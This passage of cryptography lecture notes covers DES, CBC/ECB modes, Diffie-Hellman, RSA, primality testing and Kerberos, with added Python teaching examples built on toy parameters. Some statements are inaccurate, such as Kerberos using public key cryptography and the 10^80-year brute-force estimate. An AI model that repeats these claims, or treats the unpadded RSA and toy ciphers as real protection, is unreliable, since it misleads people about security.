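    return [index_of_coincidence(text[i::key_len]) for i in range(key_len)]


if __name__ == "__main__":
    # Constructed sample plaintext, long enough for the statistics to show.
    plain = ("the index of coincidence measures how uneven the letter "
             "frequencies of a text are and english text is far from even "
             "so a cipher that keeps the frequencies keeps the index while "
             "a repeating key flattens it until the key length is guessed") * 3
    cipher = vigenere_encrypt(plain, "BAD")
    print("IC plaintext : %.4f" % index_of_coincidence(plain))
    print("IC ciphertext: %.4f" % index_of_coincidence(cipher))
    for shift in range(1, 7):
        print("shift %d: %.4f" % (shift, shifted_coincidence(cipher, shift)))
    print("column ICs at length 3:",
          ["%.4f" % v for v in column_ics(cipher, 3)])
```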


Index of coincidence

The ideas here were developed by William F. Friedman in his Ph.D.

Friedman also coined the words “cryptanalysis” and “cryptology”.

Friedman worked on the solution of German code systems during the first (1914-1918) world war, and later became a world-renowned cryptologist.


This session

• Finish on error correction

• Encryption

– Symmetric keys
  ∗ DES

– Public keys
  ∗ RSA


S-box

[Figure: S-box drawn as a 2:4 stage, a Permutation (3,4,2,1) and a 4:2 stage.]


S-boxes and P-boxes

The S-box (Substitution-Box) is a hardware device which encodes n bit numbers to other n bit numbers and can be represented by a permutation.

A P-box is just a simple permutation box.

If you use an S-box and a P-box at once, you have a product cipher which is generally harder to decode.


DES - Data Encryption Standard

DES was first proposed by IBM using 128 bit keys, but its security was reduced by NSA (the National Security Agency) to a 56 bit key.

At 1 ms per guess, it would take $10^{80}$ years to solve 128 bit key encryption.

The DES Standard gave a business level of safety, and is a product cipher.


DES - Data Encryption Standard

The (shared) 56 bit key is used to generate 16 subkeys, which each control a sequenced P-box or S-box stage.

DES works on 64 bit messages called blocks.

If you intercept the key, you can decode the message.

However, there are about $10^{17}$ keys.


Feistel

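[Figure: Feistel network. Each round combines (+) one half of the block with f of the other half under a subkey (K0, K1, K2), taking (l0, r0) through (l1, r1) and (l2, r2) to (l3, r3); the same rounds are then drawn from (l3, r3) back to (l0, r0).]

Each of the 16 stages (rounds) of DES uses a Feistel structure which encrypts a 64 bit value into another 64 bit value using a 48 bit key derived from the original 56 bit key.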


DES modes of operation

The US government specifically recommends not using the weakest simplest mode for messages, the Electronic Codebook (ECB) mode.

They recommend the stronger and more complex Cipher Feedback (CFB) or Cipher Block Chaining (CBC) modes.

The CBC mode XORs the next 64-bit block with the result of the previous 64-bit encryption, and is more difficult to attack.


DES modes of operation

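[Figure: Electronic Code Book, where each msg block passes through DES to give a Ctext block, and Cipher Block Chaining, where the DES stages are chained and the first stage takes an Initial vector.]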
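The Feistel round structure and the difference between ECB and CBC chaining, as an added Python example that is not part of the original notes. The block cipher is a toy 16-round Feistel network whose round function and key schedule are SHA-256 stand-ins (assumptions); it is not DES, and all names are illustrative.

```python
"""Toy Feistel cipher (NOT DES) used to compare ECB and CBC chaining."""
import hashlib

BLOCK = 8     # 64-bit blocks, the DES block size
ROUNDS = 16   # DES also uses 16 rounds


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def subkeys(key: bytes) -> list:
    """Sixteen 48-bit round keys. Stand-in schedule, not the DES one."""
    return [hashlib.sha256(key + bytes([i])).digest()[:6]
            for i in range(ROUNDS)]


def round_f(half: bytes, subkey: bytes) -> bytes:
    """Stand-in round function f; a Feistel f need not be invertible."""
    return hashlib.sha256(subkey + half).digest()[:4]


def feistel(block: bytes, keys: list) -> bytes:
    left, right = block[:4], block[4:]
    for k in keys:
        left, right = right, xor(left, round_f(right, k))
    return right + left                    # undo the final swap


def encrypt_block(block: bytes, key: bytes) -> bytes:
    return feistel(block, subkeys(key))


def decrypt_block(block: bytes, key: bytes) -> bytes:
    """Same network, subkeys in reverse order."""
    return feistel(block, subkeys(key)[::-1])


def blocks(data: bytes) -> list:
    if len(data) % BLOCK:
        raise ValueError("pad the message to a multiple of 8 bytes first")
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def ecb_encrypt(msg: bytes, key: bytes) -> bytes:
    """Every block is encrypted on its own."""
    return b"".join(encrypt_block(b, key) for b in blocks(msg))


def cbc_encrypt(msg: bytes, key: bytes, iv: bytes) -> bytes:
    """Each block is XORed with the previous ciphertext block first."""
    out, prev = [], iv
    for b in blocks(msg):
        prev = encrypt_block(xor(b, prev), key)
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(ct: bytes, key: bytes, iv: bytes) -> bytes:
    out, prev = [], iv
    for c in blocks(ct):
        out.append(xor(decrypt_block(c, key), prev))
        prev = c
    return b"".join(out)


if __name__ == "__main__":
    key = bytes(range(7))                  # constructed 56-bit key
    iv = bytes(range(8, 16))               # constructed initial vector
    msg = b"SAMEDATA" * 3                  # three identical plaintext blocks
    print("ECB:", [b.hex() for b in blocks(ecb_encrypt(msg, key))])
    print("CBC:", [b.hex() for b in blocks(cbc_encrypt(msg, key, iv))])
    print("CBC round trip:", cbc_decrypt(cbc_encrypt(msg, key, iv), key, iv))
```

Under ECB the three identical plaintext blocks produce three identical ciphertext blocks, which is the pattern leak that makes it the weakest mode; under CBC they differ.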


DES software

DES is available as a library on both UNIX and Microsoft-based systems. There is typically a des.h file, which must be included in any C source using the DES library:

    #include "des.h"
    //
    // - Your calls


DES software

After initialization of the DES engine, the library provides a system call which can both encrypt and decrypt:

    int des_cbc_encrypt(clear, cipher, schedule, encrypt)

where the encrypt parameter determines if we are to encipher or decipher.

The schedule contains the secret DES key.


Case study: Amoeba capabilities

All Amoeba objects are identified by a capability string which is encrypted using DES encryption. A capability is long enough so that you can’t just make them up.

If you have the string, you have whatever the capability allows you. If you want to give someone some access to a file, you can give them the capability string. They place this in their directory, and can see the file.


Case study: Amoeba capabilities

Field         Size        Purpose
Server Port   (48 bits)   Identifies the server which manages the object
Object ID     (24 bits)   Internal number which the server uses to identify the object
Rights        (8 bits)    Identifies which operations are allowed
Checkfield    (48 bits)   Protects against forging

To further prevent tampering, the capability is DES encrypted. The resultant bit stream may be used directly, or converted to and from an ASCII string with the a2c and c2a commands.


This session

• Finish on error correction

• Encryption

  – Symmetric keys

    ∗ DES

  – Public keys

    ∗ RSA


Public key systems

In 1976 Diffie and Hellman published the paper “New Directions in Cryptography”, which first introduced the idea of public key cryptography.

Public key cryptography relies on the use of enciphering functions which are not realistically invertible unless you have a deciphering key.

For example, we have the discrete logarithm problem in which it is relatively easy to calculate $n = g^k \bmod p$ given g, k and p, but difficult to calculate k in the same equation, given g, n and p.


Diffie-Hellman key agreement

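Two separated users create and share a secret key. A third party is not realistically able to calculate the shared key.

[Figure: Alice (who knows p, g, a) sends $g^a \bmod p$ to Bob; Bob (who knows p, g, b) sends $g^b \bmod p$ to Alice; Ted, listening in between, sees p, g, $g^a \bmod p$ and $g^b \bmod p$.]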


Knowledge different

• All participants know two system parameters p, and g

• Alice and Bob each have a secret value (Alice has a and Bob has b)

• Alice and Bob each calculate and exchange a public key ($g^a \bmod p$ for Alice and $g^b \bmod p$ for Bob).

• Ted knows g, p, $g^a \bmod p$ and $g^b \bmod p$, but not a or b.


Diffie-Hellman key agreement

Both Alice and Bob can now calculate the value $g^{ab} \bmod p$.

1. Alice calculates $(g^b \bmod p)^a \bmod p = (g^b)^a \bmod p$.

2. Bob calculates $(g^a \bmod p)^b \bmod p = (g^a)^b \bmod p$.

And of course $(g^b)^a \bmod p = (g^a)^b \bmod p = g^{ab} \bmod p$, which is the shared key.


Diffie-Hellman key agreement

Ted has a much more difficult problem. It is difficult to calculate $g^{ab} \bmod p$ without knowing either a or b. The algorithmic run-time of the (so-far best) algorithm for doing this is in

$O(e^{c\sqrt{r \log r}})$

where c is small, but ≥ 1, and r is the number of bits in the number.


Diffie-Hellman key agreement

By contrast, the enciphering and deciphering process may be done in $O(r)$:

Bit size Enciphering Discrete logarithm solution

10 10 23

100 100 1,386,282

1,000 1,000 612,700,000,000,000,000,000,000
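
The key agreement and the cost gap between the participants and Ted, as an added example that is not part of the original notes. The values p = 2039, g = 7 and the secrets are constructed toy numbers, and Ted's search here is plain exhaustive trial of exponents, not the sub-exponential algorithm the slide refers to.

```python
# Added example: toy Diffie-Hellman run plus an eavesdropper's exhaustive search.
# All parameters are constructed and far too small for real use.

def modexp(base, exponent, modulus):
    """Square-and-multiply. Returns (base**exponent % modulus, multiplications used).
    The work grows with the number of bits r in the exponent."""
    result, mults = 1, 0
    base %= modulus
    while exponent:
        if exponent & 1:
            result = result * base % modulus
            mults += 1
        base = base * base % modulus
        mults += 1
        exponent >>= 1
    return result, mults


def ted_discrete_log(g, target, p):
    """Ted's generic attack: try k = 1, 2, 3, ... until g^k mod p equals target.
    Returns (k, multiplications used); the work grows with p itself."""
    value = 1
    for k in range(1, p):
        value = value * g % p
        if value == target:
            return k, k
    raise ValueError("target is not a power of g modulo p")


def exchange(p, g, a, b):
    """Run the agreement, then let Ted attack using only p, g and the public values."""
    pub_a, cost_alice = modexp(g, a, p)      # Alice publishes g^a mod p
    pub_b, _ = modexp(g, b, p)               # Bob publishes g^b mod p
    key_alice, _ = modexp(pub_b, a, p)       # (g^b)^a mod p
    key_bob, _ = modexp(pub_a, b, p)         # (g^a)^b mod p
    k, cost_ted = ted_discrete_log(g, pub_a, p)
    key_ted, _ = modexp(pub_b, k, p)         # any k with g^k = g^a gives the same key
    return {"alice": key_alice, "bob": key_bob, "ted": key_ted,
            "cost_alice": cost_alice, "cost_ted": cost_ted}


if __name__ == "__main__":
    # Two constructed primes: the participants' cost barely moves, Ted's scales with p.
    for p, a, b in ((2039, 1234, 987), (1000003, 654321, 123457)):
        r = exchange(p, 7, a, b)
        print(f"p={p}: shared key {r['alice']}, "
              f"Alice used {r['cost_alice']} multiplications, Ted used {r['cost_ted']}")
```
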


Encryption

[Figure: plaintext P is enciphered with K1 to give K1[P], which is deciphered with K2 to give P again. (K1[K2[P]] = P) and also (K2[K1[P]] = P).]


Authentication

[Figure: authentication using two key pairs, (K1, K2) and (J1, J2); the message P travels as K1[J2[P]].]


This session

• Finish on error correction

• Encryption

  – Symmetric keys

    ∗ DES

  – Public keys

    ∗ RSA


RSA (Rivest, Shamir, Adleman)

This public key system relies on the difficult problem of trying to find the complete factorization of a large composite [9] integer whose prime factors [10] are not known.

[9] An integer larger than 1 is called composite if it has at least one divisor larger than 1.

[10] The Fundamental Theorem of Arithmetic states that any integer N (greater than 0) may be expressed uniquely as the product of prime numbers.


RSA hacks

Two RSA-encrypted messages have been cracked:

• The inventors of RSA published a 129-digit (430 bits) RSA public key. In 1994, it was factored with 5000 MIPS-years of computing time.

• A year later, a 384-bit PGP key was cracked. It needed 1300 MIPS-years to factor the key in three months.

Note that these efforts each only cracked a single RSA key.


RSA hacks

If you happen to be able to factor the following number, please tell Hugh - we can split US$200,000 [11]!

25195908475657893494027183240048398571429282126204032027777137836043662020707595556264018525880784406918290641249515082189298559149176184502808489120072844992687392807287776735971418347270261896375014971824691165077613379859095700097330459748808428401797429100642458691817195118746121515172654632282216869987549182422433637259085141865462043576798423387184774447920739934236584823824281198163815010674810451660377306056201619676256133844143603833904414952634432190114657544454178424020924616515723350778707749817125772467962926386356373289912154831438167899885040445364023527381951378636564391212010397122822120720357

[11] US$150,000 for me, US$50,000 for you...


RSA coding algorithms

Below are outlined the four processes needed for RSA encryption:

1. Creating a public key

2. Creating a secret key

3. Encrypting messages

4. Decoding messages


To create public key $K_p$

1. Select two different large primes P and Q.

2. Assign $x = (P - 1)(Q - 1)$. (Does this ring a bell?)

3. Choose E relatively prime to x. (This must satisfy the condition for $K_s$ given later.)

4. Assign $N = P * Q$.

5. $K_p$ is N concatenated with E.


To create private (secret) key $K_s$

1. Choose D: $D * E \bmod x = 1$.

(a) (i.e. multiplicative inverses)

(b) another way: $DE = k(P - 1)(Q - 1) + 1$

2. $K_s$ is N concatenated with D.


To encode plain text m

1. Pretend m is a number.

2. Calculate $c = m^E \bmod N$.


To decode c back to m

1. Calculate $m = c^D \bmod N$.

2. ....WHY?....


...Why?...

$c^D \bmod N = m^{ED} \bmod N$

$= m^{k(P-1)(Q-1)+1} \bmod PQ$

$= m * m^{k(P-1)(Q-1)} \bmod PQ$

• $m^{P-1} \bmod P = 1$, so $(m^{(P-1)})^{k(Q-1)} \bmod P = 1$

• $m^{Q-1} \bmod Q = 1$, and so (tutorial) $(m^{(P-1)})^{k(Q-1)} \bmod PQ = 1$.

$c^D \bmod N = m^{ED} \bmod N$
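
The four processes carried through with small numbers, followed by a line-by-line check of the "...Why?..." argument. This is an added example, not code from the original notes; P = 61, Q = 53 and E = 17 are constructed toy values, and the function names are this example's own.

```python
# Added example: textbook RSA exactly as in the steps above (no padding),
# with constructed toy primes. Requires Python 3.8+ for pow(E, -1, x).
from math import gcd


def make_keys(P, Q, E):
    """Return (Kp, Ks) = ((N, E), (N, D)) following the key-creation steps."""
    if P == Q:
        raise ValueError("P and Q must be different primes")
    x = (P - 1) * (Q - 1)
    if gcd(E, x) != 1:
        raise ValueError("E must be relatively prime to x")
    N = P * Q
    D = pow(E, -1, x)                 # the D with D * E mod x = 1
    return (N, E), (N, D)


def encode(m, Kp):
    """c = m^E mod N. The message must already be a number below N."""
    N, E = Kp
    if not 0 <= m < N:
        raise ValueError("m must be in the range 0..N-1")
    return pow(m, E, N)


def decode(c, Ks):
    """m = c^D mod N."""
    N, D = Ks
    return pow(c, D, N)


def why(m, P, Q, E):
    """Check each step of the argument for one message m."""
    Kp, Ks = make_keys(P, Q, E)
    N, D = Ks
    x = (P - 1) * (Q - 1)
    k = (D * E - 1) // x              # DE = k(P-1)(Q-1) + 1
    return {
        "k": k,
        "DE = kx + 1": D * E == k * x + 1,
        # Holds when m shares no factor with N (Fermat's little theorem mod P and mod Q).
        "m^(kx) mod N = 1": pow(m, k * x, N) == 1,
        "decodes": decode(encode(m, Kp), Ks) == m,
    }


if __name__ == "__main__":
    Kp, Ks = make_keys(61, 53, 17)
    print("Kp =", Kp, " Ks =", Ks)
    c = encode(65, Kp)
    print("65 ->", c, "->", decode(c, Ks))
    print(why(65, 61, 53, 17))
    # Edge case: m = 61 is a multiple of P, so m^(kx) mod N is not 1,
    # yet decoding still returns m because the result is right mod P and mod Q.
    print(why(61, 61, 53, 17))
    # The same m always encodes to the same c, so equal messages are visible as equal.
    print(encode(65, Kp) == encode(65, Kp))
```
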


RSA code

#!/usr/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)

and then

• echo "squeamish ossifrage" | ./rsa.perl -k=10001 -n=1967cb529 > msg.rsa

• ./rsa.perl -d -k=ac363601 -n=1967cb529 < msg.rsa


Testing large numbers for primality

RSA requires us to generate large prime numbers, but there is no algorithm for constructing arbitrarily large prime numbers. Instead we use statistical testing methods to determine primality.

Quiz! Is 162,259,276,829,213,363,391,578,010,288,127 prime [12]?

After choosing a large random (odd) number p, we can quickly see if p is divisible by 2, 3 and so on (say all primes up to 1000). If our number p passes this, then we can perform some sort of statistical primality test.

[12] Note that this is only a 33 digit number, and we typically use prime numbers with hundreds of digits.


Lehmann test

1. Choose a random number w (for witness) less than p

2. If $w^{(p-1)/2} \not\equiv \pm 1 \bmod p$ then p is not prime

3. If $w^{(p-1)/2} \equiv \pm 1 \bmod p$ then the likelihood is less than 0.5 that p is not prime

Repeat the test over and over, say n times. The likelihood of a false positive will be less than $\frac{1}{2^n}$. Other tests, such as the Rabin-Miller test, may converge more quickly.
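
The trial division from the previous slide followed by the Lehmann test, applied to the quiz number, as an added example that is not part of the original notes. The `require_minus_one` rule (the result −1 must turn up at least once) is an addition to the three steps above, and the 1729 case in the code shows why it is there; the parameter names are this example's own.

```python
# Added example: trial division by the primes up to 1000, then the Lehmann test.
import random


def primes_up_to(limit):
    """Sieve of Eratosthenes."""
    sieve = bytearray([1]) * (limit + 1)
    sieve[0:2] = b"\x00\x00"
    for i in range(2, int(limit ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, limit + 1, i)))
    return [i for i, flag in enumerate(sieve) if flag]


SMALL_PRIMES = primes_up_to(1000)
QUIZ = 162259276829213363391578010288127      # the 33 digit number from the quiz


def lehmann(p, rounds=40, witnesses=None, trial_division=True, require_minus_one=True):
    """False: p is certainly not prime. True: p passed every round.

    witnesses lets a caller fix the values of w (used below to make a failure
    reproducible); by default they are drawn at random, as in step 1."""
    if p < 2:
        return False
    if trial_division:
        for q in SMALL_PRIMES:
            if p == q:
                return True
            if p % q == 0:
                return False
    elif p < 5:
        return p in (2, 3)
    elif p % 2 == 0:
        return False
    if witnesses is None:
        rng = random.SystemRandom()
        witnesses = (rng.randrange(2, p - 1) for _ in range(rounds))
    saw_minus_one = False
    for w in witnesses:
        r = pow(w, (p - 1) // 2, p)
        if r == p - 1:                 # congruent to -1
            saw_minus_one = True
        elif r != 1:                   # neither +1 nor -1: step 2, not prime
            return False
    # For a prime, about half of all witnesses give -1. A composite such as
    # 1729 = 7 * 13 * 19 gives +1 for every witness that shares no factor with it.
    return saw_minus_one or not require_minus_one


if __name__ == "__main__":
    print("quiz number passes:", lehmann(QUIZ))
    print("1009 * 1013 passes:", lehmann(1009 * 1013))
    fixed = [2, 3, 5]                  # constructed witnesses, all coprime to 1729
    print("1729, steps 1-3 only:",
          lehmann(1729, witnesses=fixed, trial_division=False, require_minus_one=False))
    print("1729, -1 required:  ",
          lehmann(1729, witnesses=fixed, trial_division=False))
```

With real key sizes the trial division step removes most candidates cheaply before any modular exponentiation is done.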


Primes is in P!

A group at the Indian Institute of Technology have discovered the unexpected result that testing a number for primality can be done in polynomial time, rather than using probabilistic tests as just shown.

This is unlikely to affect the effectiveness of public key systems.

The paper is only 7 pages long and is beautifully written...


Case study: PGP

PGP (Pretty Good Privacy) is a public key encryption package to protect E-mail and data files.

It lets you communicate securely with people you’ve never met, with no secure channels needed for prior exchange of keys.

PGP can be used to append digital signatures to messages, as well as encrypt the messages, or do both.


Case study: PGP

It uses various schemes including patented ones like IDEA and RSA.

The patent on IDEA allows non-commercial distribution, and the RSA patent has expired.

However there are also commercial versions of PGP.

PGP can use, for example, 2048 bit primes, and it is considered unlikely that PGP with this level of encryption can be broken.


Chapter 8

Lecture 8 - Protocols


Mid semester Test

9th October 2003

LT27, 14:30

MCQ, closed book

Covers everything up to and including today...


Last session

• Finish on error correction

• Encryption

  – Symmetric keys

    ∗ DES

  – Public keys

    ∗ RSA


This session

• Kerberos

• Voting

• Contract signing


Summary

Substitution, Vigenère, index of coincidence

DES, Feistel, modes of operation

Public key, Diffie Hellman, RSA


Vigenère

If our keyword was BAD, then encoding HAD A FEED would result in

Key    B A D B A D B A
Text   H A D A F E E D
Cipher I A G B F H F D

If we can discover the length of the repeated key (in this case 3), and the text is long enough, we can just consider the cipher text to be a group of interleaved monoalphabetic substitution ciphers and solve accordingly.


Analysis

The index of coincidence is the probability that two randomly chosen letters from the cipher will be the same, and it can help us discover the length of a key

$IC = \frac{1}{N(N-1)} \sum_{i=0}^{25} F_i(F_i - 1)$

where $F_i$ is the frequency of the occurrences of symbol i and N is the length of the cipher.
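
The formula put to work on the BAD example from the previous slide, as an added example that is not part of the original notes. The sample plaintext is constructed, and the rule for picking the period (the smallest one scoring within 85% of the best) is this example's own choice, made because every multiple of the true key length scores just as well.

```python
# Added example: index of coincidence used to find a Vigenere key length.
from collections import Counter

# Constructed sample plaintext.
SAMPLE = (
    "The index of coincidence measures how uneven the letter frequencies of a text are. "
    "Ordinary English prose scores well above random text because a handful of letters "
    "such as e, t, a, o and n turn up far more often than all the others. A cipher that "
    "uses several alphabets in rotation flattens those frequencies and pulls the score "
    "down toward the value expected for random letters. Splitting the cipher text into "
    "columns, one for each letter of the key, brings the uneven shape back, since every "
    "letter in a column has been shifted by the same amount. Trying each possible period "
    "in turn and watching for the score to jump is therefore a simple way to learn the "
    "length of the key before attacking the columns one at a time."
)


def letters(text):
    """Keep A-Z only, upper-cased."""
    return "".join(ch for ch in text.upper() if "A" <= ch <= "Z")


def vigenere(text, key, decrypt=False):
    shifts = [ord(k) - 65 for k in letters(key)]
    sign = -1 if decrypt else 1
    return "".join(
        chr((ord(ch) - 65 + sign * shifts[i % len(shifts)]) % 26 + 65)
        for i, ch in enumerate(letters(text))
    )


def index_of_coincidence(text):
    """IC = sum F_i (F_i - 1) / (N (N - 1))."""
    text = letters(text)
    n = len(text)
    if n < 2:
        return 0.0
    return sum(f * (f - 1) for f in Counter(text).values()) / (n * (n - 1))


def column_ics(text, period):
    """IC of each of the `period` interleaved columns of the text."""
    text = letters(text)
    return [index_of_coincidence(text[i::period]) for i in range(period)]


def guess_key_length(cipher, max_period=8, tolerance=0.85):
    """Return (period, scores); scores maps each period to its mean column IC."""
    scores = {m: sum(column_ics(cipher, m)) / m for m in range(1, max_period + 1)}
    best = max(scores.values())
    return min(m for m, s in scores.items() if s >= tolerance * best), scores


if __name__ == "__main__":
    print(vigenere("HAD A FEED", "BAD"))            # the table from the slide
    cipher = vigenere(SAMPLE, "BAD")
    period, scores = guess_key_length(cipher)
    for m, s in scores.items():
        print(f"period {m}: mean column IC {s:.4f}")
    print("plaintext IC:", round(index_of_coincidence(SAMPLE), 4), " guessed length:", period)
```
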


DES - Feistel

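[Figure: a Feistel network drawn for three rounds. Each round combines one half with f of the other half (+ f) under a round key K0, K1 or K2, taking (l0, r0) through (l1, r1) and (l2, r2) to (l3, r3); the same structure takes (l3, r3) back to (l0, r0).]

Each of the 16 stages (rounds) of DES uses a Feistel structure which encrypts a 64 bit value into another 64 bit value using a 48 bit key derived from the original 56 bit key.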


DES modes of operation

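[Figure: two modes. Electronic Code Book: each msg block passes through DES to give a Ctext block. Cipher Block Chaining: a chain of DES blocks turning msg blocks into Ctext blocks, starting from an initial vector.]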


Public key systems

Public key cryptography relies on the use of enciphering functions which are not realistically invertible unless you have a deciphering key.

[Figure: plaintext P is enciphered with K1 to give K1[P], which is deciphered with K2 to give P again. (K1[K2[P]] = P) and also (K2[K1[P]] = P).]


Authentication

[Figure: authentication using two key pairs, (K1, K2) and (J1, J2); the message P travels as K1[J2[P]].]


Diffie-Hellman key agreement

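Two separated users create and share a secret key. A third party is not realistically able to calculate the shared key.

[Figure: Alice (who knows p, g, a) sends $g^a \bmod p$ to Bob; Bob (who knows p, g, b) sends $g^b \bmod p$ to Alice; Ted, listening in between, sees p, g, $g^a \bmod p$ and $g^b \bmod p$.]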


RSA coding algorithms

The four processes needed for RSA encryption:

1. Creating a public key

2. Creating a secret key

3. Encrypting messages

4. Decoding messages


Uses of encryption

1. Generating encrypted passwords with 1-way functions

2. Checking integrity by appending digital signature

3. Checking the authenticity of a message.

4. Encrypting timestamps with messages to prevent replay attacks.

5. Exchanging a key.


Protocols

Systems in which the protocol plays a large part:

1. Kerberos protocol for distributing keys

2. Voting protocols

3. Contract signing protocols

These three protocols are by no means the only ones.


Other examples

Key distribution

Clipper

Oblivious transfer, in which two parties can complete a joint computation, without either party revealing any unnecessary data.


Kerberos/Cerberus


Kerberos

Network authentication protocol.

Strong authentication for client/server applications using public key cryptography.

Kerberos is freely available in source form

Kerberos is also available in commercial products.

Client can prove its identity to a server (and vice versa)across an insecure network connection.


Kerberos

After a client and server have used Kerberos to prove their identity, they can also encrypt all of their communications to assure privacy and data integrity as they go about their business.

Must have a Key Distribution Center (KDC)

Kerberos uses Needham-Schroeder protocol.


Kerberos

[Figure: the Client, the KDC (with its Authentication and Ticket granting parts) and the Server, joined by message exchanges numbered (1) to (6).]


Kerberos

When a client first authenticates to Kerberos, she:

1. Talks to KDC, to get a Ticket Granting Ticket

2. Uses that to talk to the Ticket Granting Service

3. Uses the ticket, to interact with the server.

This way a user doesn’t have to reenter passwords every time they wish to connect to a Kerberized service. If the Ticket Granting Ticket is compromised, an attacker can only masquerade as a user until the ticket expires.


Kerberos protocol

Two sorts of credentials: tickets and authenticators.

A ticket $T_{c,s}$ contains the client’s name and network address, the server’s name, a timestamp and a session key. This is encrypted with the server’s secret key (so that the client is unable to modify it).

An authenticator $A_{c,s}$ contains the client’s name, a timestamp and an optional extra session key. This is encrypted with the session key shared between the client and the server.


Kerberos protocol

A key $K_{x,y}$ is a session key shared by both x and y.

When we encrypt a message M using the key $K_{x,y}$ we write it as $\{M\}K_{x,y}$.


Kerberos protocol

Alice wants session key for communication with Bob:

• Alice sends message to Ted containing her identity, Ted’s TGS identity, and one-time value (n): a, tgs, n.

• Ted responds with a key encrypted with Alice’s secret key (which Ted knows), and a ticket encrypted with the TGS secret key: $\{K_{a,tgs}, n\}K_a\ \{T_{a,tgs}\}K_{tgs}$. Alice now has ticket and session key: $\{T_{a,tgs}\}K_{tgs}$, $K_{a,tgs}$

• Alice can prove her identity to the TGS, as she has session key $K_{a,tgs}$, and Ticket Granting Ticket: $\{T_{a,tgs}\}K_{tgs}$.


Kerberos protocol

Later, Alice can ask the TGS for a specific service ticket:

• When Alice wants a ticket for a specific service (say with Bob), she sends an authenticator along with the Ticket Granting Ticket to the TGS: $\{A_{a,b}\}K_{a,tgs}\ \{T_{a,tgs}\}K_{tgs}$, b, n.

• The TGS responds with a suitable key and a ticket: $\{K_{a,b}, n\}K_{a,tgs}\ \{T_{a,b}\}K_b$.

• Alice can now use an authenticator and ticket directly with Bob: $\{A_{a,b}\}K_{a,b}\ \{T_{a,b}\}K_b$.
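
The two exchanges above and Alice's final message to Bob, run end to end, as an added example that is not part of the original notes and is not Kerberos code. The `seal`/`unseal` pair is a toy stand-in cipher built from SHA-256 and HMAC, and the field names, the address, `LIFETIME` and `MAX_SKEW` are constructed for the example.

```python
# Added example: the message flow with tickets and authenticators.
import hashlib, hmac, json, os, time

LIFETIME = 300      # ticket lifetime in seconds (constructed value)
MAX_SKEW = 60       # how old an authenticator may be (constructed value)

def _stream(key, nonce, n):
    blocks = (hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
              for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]

def seal(key, fields):
    """{fields}K as hex. Toy cipher (hash keystream + HMAC tag), a stand-in only."""
    plain = json.dumps(fields).encode()
    nonce = os.urandom(16)
    body = bytes(x ^ y for x, y in zip(plain, _stream(key, nonce, len(plain))))
    tag = hmac.new(key, nonce + body, hashlib.sha256).digest()
    return (nonce + body + tag).hex()

def unseal(key, blob):
    raw = bytes.fromhex(blob)
    nonce, body, tag = raw[:16], raw[16:-32], raw[-32:]
    expected = hmac.new(key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("wrong key or modified message")
    plain = bytes(x ^ y for x, y in zip(body, _stream(key, nonce, len(body))))
    return json.loads(plain)

def make_ticket(server_key, client, server, session_key, now):
    """{T_c,s}K_s: sealed under the server's key, so the client cannot alter it."""
    return seal(server_key, {"client": client, "addr": "192.0.2.7", "server": server,
                             "time": now, "key": session_key.hex()})

def make_authenticator(session_key, client, now):
    """{A_c,s}K_c,s: client name and timestamp under the shared session key."""
    return seal(session_key, {"client": client, "time": now})

def verify(server_key, auth, ticket, now):
    """Server side (TGS or Bob): open the ticket, then the authenticator."""
    t = unseal(server_key, ticket)
    session_key = bytes.fromhex(t["key"])
    a = unseal(session_key, auth)
    if a["client"] != t["client"]:
        raise ValueError("authenticator does not match ticket")
    if now - t["time"] > LIFETIME:
        raise ValueError("ticket expired")
    if abs(now - a["time"]) > MAX_SKEW:
        raise ValueError("stale authenticator")
    return t["client"], session_key

class KDC:
    def __init__(self, keys):
        self.keys = keys                      # long-term secret keys, by name

    def authentication(self, a, tgs, n, now):
        """a, tgs, n  ->  {K_a,tgs, n}K_a  {T_a,tgs}K_tgs"""
        k = os.urandom(16)
        return (seal(self.keys[a], {"key": k.hex(), "n": n}),
                make_ticket(self.keys[tgs], a, tgs, k, now))

    def ticket_granting(self, auth, tgt, b, n, now):
        """{A_a,b}K_a,tgs {T_a,tgs}K_tgs, b, n  ->  {K_a,b, n}K_a,tgs  {T_a,b}K_b"""
        client, k_a_tgs = verify(self.keys["tgs"], auth, tgt, now)
        k = os.urandom(16)
        return (seal(k_a_tgs, {"key": k.hex(), "n": n}),
                make_ticket(self.keys[b], client, b, k, now))

def open_reply(key, reply, n):
    fields = unseal(key, reply)
    if fields["n"] != n:                      # the one-time value ties reply to request
        raise ValueError("reply does not answer this request")
    return bytes.fromhex(fields["key"])

def run(tamper=False, delay=0, now=None):
    """Alice gets a TGT, then a ticket for Bob, and presents it `delay` seconds later."""
    now = time.time() if now is None else now
    keys = {name: os.urandom(16) for name in ("alice", "bob", "tgs")}
    kdc = KDC(keys)
    n1, n2 = os.urandom(8).hex(), os.urandom(8).hex()
    reply, tgt = kdc.authentication("alice", "tgs", n1, now)
    k_a_tgs = open_reply(keys["alice"], reply, n1)
    auth = make_authenticator(k_a_tgs, "alice", now)
    reply, t_ab = kdc.ticket_granting(auth, tgt, "bob", n2, now)
    k_ab = open_reply(k_a_tgs, reply, n2)
    if tamper:                                # Alice edits one character of her ticket
        t_ab = t_ab[:40] + ("0" if t_ab[40] != "0" else "1") + t_ab[41:]
    later = now + delay
    client, k_bob = verify(keys["bob"], make_authenticator(k_ab, "alice", later), t_ab, later)
    return client, k_bob == k_ab
```

Calling `run()` returns the name Bob accepted and whether both ends hold the same session key; `run(tamper=True)` and `run(delay=LIFETIME + 1)` raise, which are the two properties the slides state for tickets.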


Weaknesses

Host security: Kerberos makes no provisions for host security; it assumes that it is running on trusted hosts with an untrusted network.

KDC compromises: Kerberos uses a principal’s password (encryption key) as the fundamental proof of identity.

Salt: This is an additional input to the one-way hash algorithm.


Voting protocols

A voting protocol is one in which

• independent systems vote in a kind of election, and

• afterwards we can check that the vote was correct.

• Each voter is only allowed a single vote, and

• the system should be corruption-proof.


Voting protocols

